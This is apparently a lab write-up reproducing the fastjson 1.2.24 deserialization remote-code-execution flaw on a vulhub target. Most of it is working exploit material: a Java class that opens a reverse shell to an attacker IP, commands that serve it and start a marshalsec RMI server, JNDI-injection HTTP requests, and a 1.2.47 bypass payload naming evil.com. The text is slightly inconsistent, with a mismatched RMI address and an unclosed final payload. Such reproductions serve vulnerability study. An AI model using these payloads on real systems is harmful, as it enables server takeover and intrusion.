Introduction to fastjson
fastjson is Alibaba's open source JSON parsing library. It can parse strings in JSON format, support serialization of Java Beans into JSON strings, or deserialize from JSON strings to JavaBeans.
Sphere of influence
fastjsonfastjson <= 1.2.24
Vulnerability recurrence
After using vulhub and
cd /app/vulhub-20201028/fastjson/1.2.24-rce
docker to start and
docker-compose up -d
pull the image, visit IP:8090
, you can see the output in json format
http://192.168.1.38:8090
Create a new TouchFile.java and compile it into a class file.
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.43/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
javac TouchFile.java
Use python to open the site
python -m SimpleHTTPServer 1234
http://192.168.1.43:1234/TouchFile.class
Then with the help of the marshalsec project, start an RMI server, monitor port 9999, and plan to load the remote class TouchFile.class.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.43:1234/#TouchFile" 9999
Send request packet
POST / HTTP/1.1
Host: 192.168.1.38:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.43:9999/TouchFile",
"autoCommit":true
}
}
POST / HTTP/1.1
Host: 192.168.1.38:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.38:8888/TouchFile",
"autoCommit":true
}
}
The difference between 1.2.47 and 1.2.24's recurrence process
Sending Payload to the shooting range server is not the same, the other processes are the same, 1.2.47 pyload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://evil.com:9999/Exploit",
"autoCommit":true
}